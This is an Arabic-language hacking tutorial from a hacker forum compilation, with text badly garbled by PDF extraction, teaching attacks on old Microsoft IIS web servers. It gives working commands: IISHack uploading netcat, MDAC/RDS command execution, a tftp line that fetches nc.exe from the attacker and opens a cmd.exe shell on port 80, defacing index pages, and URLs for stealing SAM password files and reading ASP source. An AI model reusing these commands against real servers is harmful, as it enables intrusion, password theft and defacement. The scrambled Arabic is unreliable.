ﻗﻊ( http://www.activestate.com/ : ﺘﺸﻐﯿ ﻞ ﻣﻠﻔﺎ تاﻟﺒﯿ ﺮ ل)ﯾﻤﻜﻨﻚﺗﻨﺰﯾﻠﻪ ﻣﻦاﻟﻤﻮ
ﺘﯿ ﻒﺑﯿ ﺮ لﻟ -٢ﺎﻛ
-٣وﯾﺐ ﺳﯿ ﺮﻓ ﺮ )اي ﻧﻮ ع( ﺎﺑﺎﺗﺸﻲاو IIS ..
-----------------------
IIS Hack.exe : -
------------------------
ﺘ ﺤﻤﯿ ﻞ ﻧﺴﺨﻪ ذﻛﯿﺔ ﻣﻦ nc.exeﻮﺟﻌﻠﻬﺎ
ﺘﺸ ﻒ ﺧﺒ ﺮا ءاﻻﻣﻦﻓﻲ ﺷ ﺮﻛﺔ eEyeﺛﻐ ﺮةاﻣﻨﯿﺔﺗﺴﻤﺢﻟﻚﺑ اﻛ
ﺗﻨﺼ ﺖ ﻋﻠﻰاﻟﻤﻨﻔﺬ .. ٨٠
ﺘﯿﺎزا ت Administrator . ﻮﻫﺬا ﺳﯿﻌﻄﯿﻚ ﺳﻄ ﺮاواﻣ ﺮ cmde.exeﻣﻊاﻣ
ﻗﻊ . http://www .technotronic.com/ ﺑﺎﻣﻜﺎﻧﻚاﻧﺰا ل NC.exeﻮ IIS Hack.exeﻣﻦاﻟﻤﻮ
ﻮﯾﺠﺐﺗﺸﻐﯿ ﻞ وﯾﺐ ﺳﯿ ﺮﻓ ﺮﻓﻲ ﺟﻬﺎزكﻗﺒ ﻞﺗﻨﻔﯿﺬاﻟﺜﻐ ﺮة ..
ﻗﻢﺑﻨﺴ ﺦاداة nc.exeﻮ ﺿﻌﻬﺎﻓﻲاﻟﺪﻟﯿ ﻞاﻟ ﺮﺋﯿﺴﻲﻟﻠﻮﯾﺐ ﺳﯿ ﺮﻓ ﺮﻟﺪﯾﻚ )ﻓﻲاﺑﺎﺗﺸﻲ ) Htdocsﻮﻓﻲ IIS
ﺎﻟﺪﻟﯿ ﻞ wwwroot .
ﺘﺸﻐﯿ ﻞ IISHack.exe : ﺛﻢﻗﻢﺑ
80 your_IP/ncx.exe http://www.target.com/c:\>iishack.exe
ﻮﺑﻌﺪاﺗﻤﺎم ﺎﻟﺨﻄﻮةاﻟﺴﺎﺑﻘﺔﺑﻨﺠﺎ ح :
ﺘﺠﺪاﻣﺎﻣﻚ eGG SheLL http://www .target.com/c:\>ncﻮﺳ
١١٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻗﻌﻪ(( .
ﺘﻢﺗ ﺮﻛﯿﺐاﻟ ﺮ
ﻣﻼ ﺣﻈﺔ :ﺗﻌﻤ ﻞ ﻫﺬهاﻟﺜﻐ ﺮة ﻋﻠﻰ ﺳﯿ ﺮﻓ ﺮا ت IIS4.0ﻓﻘﻂ ))اذاﻟﻢ ﯾ
do you want me to explain what to do next, hey common you must be
kidding
...hehe....
-----------------------
MDAC = RDS :-
-----------------------
ﻗﻊﺗﻌﺎﻧﻲ ﻣﻨﻬﺎ .. ﺘﻘﺪاﻧﻬﺎﺛﻐ ﺮةﻗﺪﯾﻤﺔﻗﻠﯿﻼ )ﻟﻜﻨﻲ ﻣﺎ زﻟ ﺖارىان %٤٠ﻣﻦ ﺎﻟﻤﻮا اﻋ
ﺘﺨﺪمﺘﻚ ﻣﺴ ﺘﻢﺗﺸﻐﯿ ﻞ واﻣ ﺮكﺑﺼﻔ ﺘﺸﻐﯿ ﻞاواﻣ ﺮك ﻋﻠﻰاﻟﻨﻈﺎماﻟﻬﺪ فﺑﺸﻜ ﻞ ﻣ ﺤﻠﻲ ..ﺳﯿﺗﺴﻤﺢﻟﻚﻫﺬهاﻟﺜﻐ ﺮةﺑ
SYSTEMﺎيﺑﺼﻼ ﺣﯿﺎ ت ﻣﺪﯾ ﺮاﻟﻨﻈﺎم ..ﻋﻠﻰ ﺎﻟﻌﻤﻮماذاارد ت ﻣﻌ ﺮﻓﺔاذا ﻣﺎﻛﺎناﻟﻨﻈﺎم ﻣﺼﺎﺑﺎﺑﻬﺬه
اﻟﺜﻐ ﺮةام ﻻ ..
ﻗﻢاوﻻﺑﺎﻻﺗﺼﺎ لﺑﺎﻟﻨﻈﺎماﻟﻬﺪ ف 80 http://www.host.com/ : c:\>nc -nw -w 2ﺛﻢﻗﻢﺑﺎرﺳﺎ ل
اﻻﻣ ﺮ : GET /msadc/msadcs.dll HTTP
ﻗﯿﻌﻪ (( ..
ﺘﻢﺗ ﺮﻓﺈذاﻛﺎناﻟ ﺮد : application/x_vargﻓﻬﺬا ﯾﻌﻨﻲان ﺎﻟﻨﻈﺎم ﻣﺼﺎب ))اذاﻟﻢ ﯾ
ﻗﻊ (( www.wiretrip.net/rfp : ﺘﺎ تﺑﯿ ﺮ لﺗﺴﻬ ﻞ ﻋﻠﯿﻚ ﺎﻟﻌﻤ ﻞﻓﻲﻫﺬااﻟﻤﻮ
ﺑﺎﻣﻜﺎﻧﻚاﯾﺠﺎد ﺳﻜ ﺮﺑ
mdac.pl - msadc2.pl )) v
c:\> mdac.pl -h host.com
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c
ﺈذاارد تﺗﻐﯿﯿ ﺮاﻟﺼﻔ ﺤﻪاﻟ ﺮﺋﯿﺴﯿﺔ ﻣﺎ ﻋﻠﯿﻚاﻻﺗﻨﻔﯿﺬ ﺎﻻﻣ ﺮ > : echo hacked by me hehe
C:\inetpub\wwwroot\index.htm
ﻗﺼﺪ ﻗﻊﺑﺎﻣﻜﺎﻧﻨﺎﺗ ﺤﻤﯿ ﻞ Hacker's Swiss knife Armyﺎ ﻮإذاأردﻧﺎ ﺎ ﺣﻜﺎماﻟ ﺴﯿﻄ ﺮة ﻋﻠﻰاﻟﻤﻮ
Nc.exeﺑﻮاﺳﻄﺔ ﻫﺬااﻻﻣ ﺮ :
%systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r
nc.exe&&nc.exe -l -p 80 -t -e cmd.exe
ﺘﻤﻜﻦ ﻣﻦﻗ ﺮاءﺗﻪ ﺟﯿﺪا(ﺘﻗﻢﺑﻘ ﺮا ءةاﻻﻣ ﺮ ﻣﻦاﻟﯿﺴﺎراﻟﻰاﻟﯿﻤﯿﻦﻟ )
ﺘﯿﺎزا ت Administrator . ﺘﺠﺪ ﺳﻄ ﺮاواﻣ ﺮ ﻣﻊاﻣ ﺑﻌﺪﻫﺎﻗﻢﺑﺎﻻﺗﺼﺎ لﺑﺎﻟﻨﻈﺎماﻟﻬﺪ ف ﻋﻠﻰاﻟﻤﻨﻔﺬ ٨٠وﺳ
-------------------------------------------------
Codebrws.asp & Showcode.asp :-
--------------------------------------------------
ﺘ ﺮا ﺿﯿﺎﺑ ﻞ ﯾﺠﺐ ﻋﻠﻰ ﻣﺪﯾ ﺮ
اﻟﻤﻠﻔﺎن ﻋﺒﺎرة ﻋﻦﻗﺎري ء ﻣﻠﻔﺎ ت ASPﯾﺄﺗﻲ ﻣﻊ IISﻮﻟﻜﻨﻪ ﻻ ﯾﺄﺗﻲ ﻣ ﺤﻤ ﻞاﻓ
اﻟﻨﻈﺎمﺗﻔﻌﯿﻠﻪ ..
ﺘﺴﻔﯿﺪ ﻣﻨﻬﺎﻛﺜﯿ ﺮاﻗﻬﻲﺗﺴﻤﺢﻟﻚﺑﻘ ﺮا ءةاي ﻣﻠ ﻒ(( .aspﺎﻋﻨﻲ رؤﯾﺔ ﻓﺈذاﻛﺎﻧ ﺖ ﻫﺬهاﻟﺨﺪﻣﺔ ﻣﻔﻌﻠﺔ ﺳ
اﻟﻤﺼﺪر(( .
ﺘ ﺤﺼ ﻞ ﻋﻠﻰ ﻣﻠ ﻒاﻟﺴﺎم ))اذاﻛﺎن ﺎﻟﻨﻈﺎم ﻣﺼﺎﺑﺎ (( : ﺘﺨﺪام ﻫﺬااﻻﻣ ﺮ ﺳ ﺑﺎﺳ
_http://www.victim.com/msadc/samples...nt/repair/sam.
ﺘﺨﺪاماﻻداةاﻟﻤﻔ ﻀﻠﺔﻟﺪي( LC3.0 ﺑﻌﺪ ﺎﻟ ﺤﺼﻮ ل ﻋﻠﻰ ﻣﻠ ﻒاﻟﺴﺎم Expand it & Crack it ..ﺑﺎﺳ
ﻗ ﻞ ﻣﻦ ٢٤ﺳﺎﻋﻪ ( . ﺘﻢﻛﺴ ﺮﻫﺎﻓﻲا ﺳﯿ
١١١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
----------------
Null.htw : -
----------------
ﺘﻔﺎدة ﻣﻨﻬﺎ ..
ﺘﻔﻲﻓﻘﻂﺑﻄ ﺮﯾﻘﺔاﻻﺳ
ﻋﻤﻠﯿﺔ ﺷ ﺮ حﻛﯿﻔﯿﺔ ﻋﻤ ﻞ ﻫﺬهاﻟﺜﻐ ﺮة ﻣﻌﻘﺪﻗﻠﯿﻼ ..ﻟﺬا ﺳﺄﻛ
ﺘﺼﺎرﺗﺴﻤﺢﻟﻚﺑ ﺮؤﯾﺔاﻟﺴﻮرسﻛﻮد ﻻي ﻣﻠ ﻒ ASP .. ﺑﺎ ﺧ
ﺘﻨﻔﯿﺬاﻟﺜﻐ ﺮة http://www.victim.com/null.htw?CiWe...HiliteType=full : ﻟ
ﺳﯿﻌ ﺮ ضﻟﻚﻫﺬااﻟ ﺮاﺑﻂاﻟﺴﻮرسﻛﻮداﻟﺨﺎ صﺑﺎﻟﺼﻔ ﺤﻪ Default.asp .
------------------------------
webhits.dll & .htw : -
------------------------------
ﺘﺠ ﺮﺑﺔاﻟﻠﻨﻚ ﻋﻠﻰاﻟﻨﻈﺎماﻟﻬﺪ ف http://www.victim.com/blabla.htw : اوﻻﻗﻢﺑ
ﻓﺈذاﻛﺎناﻟ ﺮدﺑﻬﺬه ﺎﻟﻌﺒﺎرة : format of the QUERY_STRING is invalidﻓﻬﺬا ﯾﻌﻨﻲان
اﻟﻨﻈﺎماﻟﻬﺪ ف ﻣﺼﺎبﺑﻨﺴﺒﺔ . %٩٠
ﺎ ﺧﯿ ﺮا ﺟ ﺮبﺗﻨﻔﯿﺬاﻟﺜﻐ ﺮةﺑﻬﺬهاﻟﻄ ﺮﯾﻘﺔ :
www .victim.com/xxxxxxxxx/xxxxxxxx/x...hilitetype=full
ﺘﺄﻛﯿﺪ ﺳﯿﻌﻤ ﻞا ﺣﺪﻫﺎ :
ـ XXXXX/XXXXX/XXXX/XXX.htwﺑﺎ ﺣﺪ ﻫﺬهاﻟﻤﻠ ﺤﻘﺎ ت ،وﺑﺎﻟ ﻣﻊﺗﻐﯿﯿ ﺮاﻟ
iissamples/issamples/oop/qfullhit.htw
iissamples/issamples/oop/qsumrhit.htw
isssamples/exair/search/qfullhit.htw
isssamples/exair/search/qsumrhit.htw
ﺘ ﺤﺼ ﻞ ﻋﻠﻰ ﻣﻠ ﻒاﻟﺴﺎمﻗﻢﺑﻜﺴ ﺮهﺑﻮاﺳﻄﻪاﻻداة LC3 .. ﺘﺎﻟﻲ ﺳﻮﺑﺎﻟ
-------------------------------------------------------
[$DATA] ASP Alternate Data Streams:-
-------------------------------------------------------
ﺘ ﺤﺪﯾﺪﻟﺴﯿ ﺮﻓ ﺮا ت IIS3.0ﻮاﻻنﺗﻌﻤ ﻞ ﻋﻠﻰ ﺘﻬﺎ ﻣﻨﺬاﻟﻌﺎم .. ١٩٩٨وﻫﻲ ﻣﺨﺼﺼﺔﺑﺎﻟ ﻫﺬهاﻟﺜﻐ ﺮةﻛﺎﻧ ﺖﺑﺪاﯾ
ﺑﻌ ﺾ ﺳﯿ ﺮﻓ ﺮا ت IIS4.0 ..
ﺘﺴﺎ ء ل ﻣﺎﻟﻔﺎﺋﺪة ﻣﻦ ﻋ ﺮ ض ﺳﻮرساﻟﺼﻔ ﺤﻪ ؟؟ (( ﺘﻬﺎ ﻋ ﺮ ضاﻟﺴﻮرسﻛﻮد ﻻي ﺻﻔ ﺤﻪ )) ﺎﻟﺒﻌ ﺾ ﯾ ﻮﻣﻬﻤ
ﺘﻮي ﻋﻠﻰ ﻣﻌﻠﻮﻣﺎ ت ﻣﻬﻤﺔ ﻣﺜ ﻞﻛﻠﻤﺎ ت ﻣ ﺮورﻗﻮاﻋﺪاﻟﺒﯿﺎﻧﺎ ت ﻣﺜ ﻞ اﻻﺟﺎﺑﺔانﺑﻌ ﺾاﻟﺼﻔ ﺤﺎ تﺗ ﺤ
Global.asa
ﺘﺼﻔﺢﺑﻮاﺳﻄﺔﻫﺬااﻷﻣ ﺮ http://www.victim.com/default.asp:: ﯾﻤﻜﻦﺗﻨﻔﯿﺬاﻟﺜﻐ ﺮة ﻣﻦاﻟﻤ
$DATA
١١٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
-----------------------
ASP dot bug : -
-----------------------
ﻗﺪمﺛﻐ ﺮةﻓﻲ ﻫﺬااﻟﻨ ﺺ ﻫﻲ ﻫﺬهاﻟﺜﻐ ﺮة ﺣﯿﺚﺗﻘﻮماﯾ ﻀﺎﺑﻌ ﺮ ضاﻟﺴﻮرسﻛﻮداﻟﺨﺎ صﺑﺄي ﺻﻔ ﺤﻪ .. رﺑﻤﺎا
ﺘﺸﺎﻓﻬﺎﻓﻲاﻟﻌﺎم .. ١٩٩٧ ﺣﯿﺚﺗﻢاﻛ
ﺘﺼﻔﺢﺑﻬﺬا ﺎﻟﺸﻜ ﻞ : ﺘﻢﺗﻨﻔﯿﺬﻫﺎ ﻣﻦاﻟﻤ ﻮﯾ
http://www.victim.com/sample.asp.ﻻ ﺣﻆاﻟﻨﻘﻄﺔاﻟﻤﻮﺟﻮدةﻓﻲا ﺧ ﺮ ﺎﻟﺴﻄ ﺮ
ﻮﻫﻲﻓﻘﻂﺗﻌﻤ ﻞ ﻋﻠﻰ ﺳﯿ ﺮﻓ ﺮا ت IIS3.0 .
-------------------------------------------
ISM.DLL Buffer Truncation : -
-------------------------------------------
ﺧﻄﺄﺑ ﺮﻣﺠﻲ ﯾﺴﻤﺢﻟﻠﻤﻬﺎﺟﻢﺑﺴ ﺤﺐ ﺎﻟﻤﻠﻔﺎ ت ورؤوﯾﺔاﻟﺴﻮرسﻛﻮداﯾ ﻀﺎ ..
ﺘ ﺤﺎﯾ ﻞ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮﺑﺈﯾﻬﺎﻣﻪاﻧﻨﺎﻗﻤﻨﺎ ﯾﻄﻠﺐ ﻣﻠ ﻒ ﻣﺎ ..وﻓﻲاﻟ ﺤﻘﯿﻘﺔ ﻧ ﺤﻦ ﻧﻘﻮمﺑﻄﻠﺐﻮﻓﻜ ﺮةاﻟﺜﻐ ﺮة ﻫﻲاﻟ
ﻣﻠ ﻒا ﺧ ﺮ ..
ﺘﻢﺗ ﺤﻤﯿﻠﻪﺑﻌﺪدﻛﺒﯿ ﺮ ﻣﻦاﻟ ﺮﻣﻮزاﻟﻤﺴﺎﻓﺔ )) ٢٠% ﺎﻟﻤﻠ ﻒ ﺎﻟﻤﺴﺆوو ل ﻋﻦﻫﺬااﻟﺨﻄﺄ ﻫﻮ ISM.dllﺣﯿﺚ ﯾ
Space .
ﯾﻤﻜﻦﺗﻨﻔﯿﺬاﻟﺜﻐ ﺮةﺑﻬﺬااﻟﺸﻜ ﻞ :
(...<=230)global.asa.htr http://www.victim.com/global.asa%20
ـ > =٢٣٠ﻧﻘﻮمﺑﻮ ﺿﻊ ٢٣٠ﻣﺴﺎﻓﺔﺑﻬﺬااﻟﺸﻜ ﻞ .. %٢٠ ﻣﻜﺎناﻟ
ﺘﻬﺎ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮاﻛﺜ ﺮ ﻣﻦ ﻣ ﺮهاﻻ ﺎذا ﻫﺬااﻟﺨﻄﺄ ﯾﻌﻤ ﻞ ﻋﻠﻰ ﺳﯿ ﺮﻓ ﺮا ت IIS 4.0&5.0 ..ﻮﻟﻜﻦ ﻻ ﯾﻤﻜﻦﺗﺠ ﺮﺑ
ﺘﺴﺠﯿ ﻞ ﺧ ﺮوج وﺗﺴﺠﯿ ﻞ د ﺧﻮ ل ،وﯾﻌﻮداﻟﺴﺒﺐﻓﻲ ذﻟﻚاناﻟﺜﻐ ﺮةاﻟﺴﺎﺑﻘﺔﺗﺆدياﻟﻰ ﺎﯾﻘﺎ فاﻟﻤﻠ ﻒ ﻗﺎمﺑ
ISM.dllﻋﻦاﻟﻌﻤ ﻞﻓﻲاﻟﺬاﻛ ﺮةﺑﯿﻨﻤﺎﺗﻄﻠﺐاﻟﺜﻐ ﺮةان ﯾﻜﻮناﻟﻤﻠ ﻒاﻟﻤﺬﻛﻮرﻗﯿﺪاﻟﻌﻤ ﻞ ..ﻟﺬا ﯾﺠﺐاﻋﺎدة
ﺗ ﺤﻤﯿ ﻞاﻟﻤﻠ ﻒﻓﻲاﻟﺬاﻛ ﺮة ﻣ ﺮها ﺧ ﺮى ..ايﺑﻤﻌﻨﻰا ﺧ ﺮ ﯾﺠﺐ ﺎن ﯾﻘﻮم ﻣﺪﯾ ﺮاﻟﻨﻈﺎماﻟﻬﺪ فﺑﻌﻤ ﻞاﻋﺎدةﺗﺸﻐﯿ ﻞ
Rebotﺎو Logout & Login .
----------
+.htr :-
---------
ﻫﺬهاﻟﺜﻐ ﺮةاﯾ ﻀﺎﺗﻘﻮمﺑﻌ ﺮ ضاﻟﺴﻮرساﻟﺨﺎ صﺑﻤﻠﻔﺎ ت ASP .
ﺘﺨﺪاﻣﻬﺎﺑﻬﺬااﻟﺸﻜ ﻞ : ﯾﻤﻜﻦاﺳ
http://www.victim.com/global.asa+.htr
١١٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
----------------
site.csc : -
----------------
ﻗﻊﺑﻤﺎﻓﻲ ذﻟﻚ DSN, UIDـ DNSﺎﻟﺨﺎ صﺑﺎﻟﻤﻮ ﺗﻤﻜﻨﻚ ﻫﺬهاﻟﺜﻐ ﺮة ﻣﻦ ﻣﻌ ﺮﻓﺔ ﻣﻌﻠﻮﻣﺎ ت ﻣﻬﻤﺔ ﻋﻦاﻟ
and PASS Database ..
ﺎﻟﺜﻐ ﺮة http://www .victim.com/adsamples/config/site.csc :
ﺳﯿﻘﻮم ﺎﻟﻤﻬﺎﺟﻢﺑﺎﻧﺰا لاﻟﻤﻠ ﻒاﻟﻤﺬﻛﻮر ..وﺳﯿ ﺤﺼ ﻞ ﻋﻠﻰ ﻣﻌﻠﻮﻣﺎ تﻗﯿﻤﺔ وﻫﺎﻣﺔأﯾ ﻀﺎ …
١١٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐACID BURN_EG:
$$$$$$$$$$$$$$$$$$$
ﺛ ﺮﺑﺎﻟﺜﻐ ﺮه ﻫﻰ::
ﺘﺄﺘﻰﺗ
ﺘﯿﻤﺰاﻟ
ﺎﻟﺴﯿﺴ
All running IIS 4 / IIS 5 web server
Windows 2k
Windows 2k SP1 + SP2
ﺛﻐ ﺮهاﻟﯿﻮﻧﻰﻛﻮد ::ﻫﻰ ﻋﺒﺎره ﻋﻦﺛﻐ ﺮهﺗﺴﻤﺢﻟﻠﻬﺎﻛ ﺮﺑﺄن ﯾﺸﻐ ﻞاواﻣ ﺮﺑﺎﻟﻘﻮهﺑﺼﻼ ﺣﯿﻪ ﻣﺴﻤﻮ حﺑﻬﺎ )اى
ﺘﯿﺎز) IUSR_machinename account ﯾﻜﻮنﻟﻪاﻣ
ﺘﯿﺠﻪان روﺗﯿﻦا ل cgiﺎﻟﻤﻮﺟﻮد ﻋﻠﻰاﻟﻮﯾﺐ ﺳ ﺮﻓ ﺮ ﻧﻔﺴﻪ ﯾﻔﻚ ﺷﻔ ﺮه ﻋﻨﻮان ﻮﺗ ﺤﺪ ثﻫﺬهاﻟﺜﻐ ﺮها ﺻﻼ ﻧ
ﺘﻔﻬﻢﺑﻌﺪ ذﻟﻚ (
ـ )DeCodeﻻﺗﻘﻠ ﻖ ﺳ ﻗﻊ ﻣﺮﺗﯿﻦ و ﻫﺬا ﻣﺎ ﻧﺴﻤﯿﻪﺑﺎﻟﺎﻟﻤﻮ
١١٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻮ ﻃﺒﻌﺎﻫﺬااﻟﻔﻮﻟﺪرﻟﯿ ﺲﻟﻪاﺳﻢﺛﺎﺑ ﺖﻫﺬاﻓﻘﻂ ﻣﺜﺎ ل وﻟﻜﻦ ﯾﻤﻜﻦان ﯾﻜﻮنﻟﻪاﺳﻤﺎ ءﻛﺜﯿ ﺮه ﻋﻠﻰاﻟﻤﻠﻘﻢ iisﻮ
ﺘﻨﻔﯿﺬىاى executable directory ﻣﻠ ﺤﻮﻇﻪ ﻫﺎﻣﻪ::ﻻ ﯾﻮﺟﺪ ﻋﻠﻰﻛ ﻞ ﻣﻠﻘﻢ iisﻫﺬااﻟﻔﻮﻟﺪراﻟ
ﺘﻰ ﺘﻔﻬﺎمﻓﻰ ﻫﺬهاﻟﺜﻐ ﺮهﻟﻬﺎ ﺪورﻓﻬﺬهاﻟﻌﻼﻣﻪﺗﻌﻨﻰاﻟ ﺤﺎﻟﻪاﻟ ﺘﻰ ﻋﻼﻣﻪاﻻﺳ ﺘﻔﻬﺎمﺗﺨﯿﻠﻮ ﺣ *؟ -ﻋﻼﻣﻪاﻻﺳ
ﺘﻔﻬﺎمﺗﻌﻨﻰﻛﻠﻤﻪ ﯾﻨﻔﺬﺑﻬﺎاﻻﻣ ﺮ ) ﻃﺒﻌﺎ ﻣ ﺶﻓﺎﻫﻢ ﯾﻌﻨﻰاﯾﻪ ( وﻻ ﯾﻬﻤﻚﺗﻌﺎﻟﻰ ﻣﻌﻰاﻓﻬﻤﻚ ﯾﻌﻨﻰاﯾﻪ ﻋﻼﻣﻪاﻻﺳ
ﺘﻰ ﺳﯿﻨﻔﺬﺑﻬﺎاﻻﻣ ﺮاىاﻧﻪاﻣ ﺮ ﻣﺜﻼ ﯾﻨﻔﺬﻓﻰﻟ ﺤﻈﻪﺛﻢ ﺘﻰﺗﻌﻨﻰاﻟ ﺤﺎﻟﻪاﻟ argumentﻮ ﻫﺬهاﻟﻜﻠﻤﻪ ﻫﻰاﻟ
ﺘﻰ ﺘﻤ ﺮ ﻣﻔﻌﻮﻟﻪ و ﺣﻘﯿﻘﻪان ﻃﺒﻌﺎ ﻣﻌﻈﻢاﻻواﻣ ﺮ ﺎﻟ
ﺘﻬﻰ ﻣﺜ ﻞ copyﻣﺜﻼاماﻧﻪاﻣ ﺮ ﻣﺜﻼ ﯾﻨﻔﺬ وﻟﻜﻦ ﯾﺴ ﯾﻨ
ﺘﺨﺪﻣﻬﺎ ﻫﻰاﻻواﻣ ﺮاﻟﻌﺎدﯾﻪ وﻫﻰ ﻣﻦ ﻧﻮ ع argument /cﻮ ﻫﺬاا ل /cﯾﻌﻨﻰان ﺎﻻﻣ ﺮ ﯾﻨﻔﺬﻓﻰﻟ ﺤﻈﻪ ﻧﺴ
ﺘﻬﻰﺛﻢ ﯾﻨ
ﺘﺮﺘﺐ ﻫﺬا )? (cmd /ﻮا ﺿﻐﻂاﻧ ﺘﺎﻋﻚ واﻛﺘﺢا ل cmdﺑ ﺗﻌﺎﻟﻰاﻓﻬﻤﻚاﻛﺜ ﺮ ::ﻟﻮ ﻋﻨﺪك وﯾﻨﺪوز ٢٠٠٠اﻓ
ﻗﻰﺘﻮ ﺿﯿﺢ واﻧ ﺖ ﻋﻠﯿﻚاﻟﺒﺎ
ﺘ ﺮ ت ﻣﻨﻪ ﺟﺰ ءﺑﺴﯿﻂﻓﻘﻂﻟﻠ ،ﺳﯿﻈﻬ ﺮﻟﻚﻛﻼمﻛﺜﯿ ﺮ ﺟﺪاا وﻟﻜﻨﻰا ﺧ
ﺷﻮ فاﯾﻪاﻟﻰ را ح ﯾﻈﻬ ﺮﻟﻚ::
Starts a new instance of the Windows 2000 command interpreter
]CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF
][[/S] [/C | /K] string
/C Carries out the command specified by string and then terminates
/K Carries out the command specified by string but remains
)/S Modifies the treatment of string after /C or /K (see below
/Q Turns echo off
)/D Disable execution of AutoRun commands from registry (see below
ﻫﺬا ﺟﺰ ءﺑﺴﯿﻂ ﺟﺪاا ﻣﻤﺎ را ح ﯾﻈﻬ ﺮﻟﻚ وﻟﻜﻦﺗﻌﺎﻟﻰ ﻧﺸﻮ ف ﻫﺬااﻟﺠﺰ ءاﯾﻪ ﻣﻌﻨﺎهاوﻻ ﯾﻘﻮﻟﻚ ::
Starts a new instance of the Windows 2000 command interpreterﻮﻫﺬه
ﺘ ﺮﺟﻢا ل وﯾﻨﺪوز ٢٠٠٠ﻮ ﻫﺬا ﻃﺒﻌﺎ و ﺿﺢﻟﻨﺎانﻛ ﻞ cmd اﻟﺠﻤﻠﻪﺗﻌﻨﻰﺑﺎﻟﻌ ﺮﺑﯿﻪﺑﺪاﯾﻪ ﺣﺎﻟﻪ ﺟﺪﯾﺪه ﻣﻦ ﻣ
ﺘﺢاو ﯾﻐﻠ ﻖ ﺎ ل arguments .ﻮﺑﻌﺪﻫﺎ ﯾﻈﻬ ﺮﻟﻨﺎ ﺘﻪ ﺣﺴﺐ ﻣﺎ ﯾﻔ ﺘﺨﻜ ﻢ ﺻﺎ ﺣﺒﻪﻓﻰ ﺣﺎﻟ ﯾﻤﻜﻦان ﯾ
ﺘﻮباﻣﺎﻣﻪ :: ﺘﻌﻤﻠﻪ داﺋﻤﺎﻓﻰ ﺎﻟﺜﻐ ﺮه وﻫﻮ /cﺷﻮﻓﻮﻛﺪه ﻣﺎاﻟﻤﻜ argumentsﻛﺜﯿ ﺮه و ﻣﻨﻬﺎاﻟﺬى ﻧﺴ
Carries out the command specified by string and then terminatesﻮ ﻫﺬا
ﺘﻰ ﻧﻌ ﺮﻓﻬﺎﺘﻬﻰ و ﻃﺒﻌﺎ ﻫﺬاﻟﻼواﻣ ﺮاﻟﻌﺎدﯾﻪاﻟاﻟﻜﻼم ﻣﻌﻨﺎهاﻧﻪ ﯾﻨﻔﺬاﻻﻣ ﺮاﻟﻤﻮﺟﻮدﻓﻰ ﺳﻄ ﺮ ﺎﻻواﻣ ﺮﺛﻢ ﯾﻨ
ﺘﻜﻠﻢ ﻋﻦ argumentﻻ ﻧ ﺮاهﻓﻰﺛﻐ ﺮهاﻟﯿﻮﻧﻰﻛﻮد و ﻫﻮ ﺘﯿﻪ ::ﺳﻮ ف ﻧﺠﺪاﻧﻪ ﯾ ﺗﻌﺎﻟﻮ ﻧﺸﻮ فاﻟﺴﻄ ﺮاﻟﻰﺗ ﺤ
ﺘﻮباﻣﺎﻣﻪ:: ا ل /kﺷﻮﻓﻮ ﺎﯾﻪ ﻣﻜ
Carries out the command specified by string but remainsﻮ ﻃﺒﻌﺎ ﻣﻌﻨﺎهاﻧﻪ
ﺘﻤ ﺮ ﻣﻔﻌﻮﻟﻬﺎ )ﻣﺎ زﻟ ﺖاﺑ ﺤﺚ ﻋﻦاواﻣ ﺮ ﻣﺜ ﻞ ﻫﺬه وﻟﻜﻦ ﻫﺬا ﻣﺎ ﯾﻨﻔﺬاﻻواﻣ ﺮاﻟﻤﻮﺟﻮدهﻓﻰاﻟﺴﻄ ﺮ وﻟﻜﻦ ﯾﺴ
١١٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﯿﻦ ﻣﺜ ﻞ pingﻣﺜﻼ ( ﺘ ﺮه ﻃﻮﯾﻠﻪ ﺣﺒﺘﻰﺗﺄ ﺧﺬﻓ ﺘﻮباﻣﺎﻣﻰ وﻟﻜﻦﺗﻘﺪرﺗﻘﻮ لاﻧﻬﺎاﻻواﻣ ﺮاﻟ ﻫﻮ ﻣﻜ
ﺘﺨﺪﻣﻪﻓﻰاﻏﻼ قﺗﻔﻌﯿ ﻞاﻣ ﺮ echoﻛﻤﺎ ﻫﻮ وا ﺿﺢﻓﻰ ﻮ ﻣﺜﻼﻫﻨﺎك argumentﺄ ﺧ ﺮ ﻣﺜ ﻞ /Qﻮ ﻫﺬا ﻧﺴ
اﻟﻤﺜﺎ لﻓﻮ ق
ﺘ ﺤﻪاو ﺘ ﺤﻜﻢﻓﯿﻪ )ﯾﻌﻨﻰﻓ ﻮ ﻫﻨﺎكاﻟﻜﺜﯿ ﺮ ﻣﻦ ﻫﺬها ل argumentsﻮ ﻃﺒﻌﺎ ﻣﻨﻬﺎ ﻣﺎ ﻫﻮاﺳﺎﺳﻰ ﻻ ﯾﻤﻜﻨﻚاﻟ
ﺘ ﺤﻜﻢﺑ ﺤﺎﻟﻪا ل ﻏﻠﻘﻪ ﻣﺜ ﻞا ل /cﻮا ل ) /kﻮ ﻫﻨﺎكا ﺧ ﺮﯾﻦ ﯾﻤﻜﻨﻚانﺗﺠﻌﻠﻬﻢ onﺎو offﻮﺑﻬﺬاﺗﻜﻮناﻧ ﺖﺗ
ﺘﻔﺼﯿ ﻞ ( و ﺘﺢ ﻮاﻟﻐﻠ ﻖﺑﺎﻟ ﻗﻰﺗﻔﺎ ﺻﯿ ﻞاﻟﻔ ﺘﻮب ﻻﻧﻚ را حﺗﻼ ﺘﻚ )ﯾﺎرﯾ ﺖﺗﻨﻔﺬاﻻﻣ ﺮ وﺗﻘ ﺮأاﻟﻤﻜ cmdﺧﺎﺻ
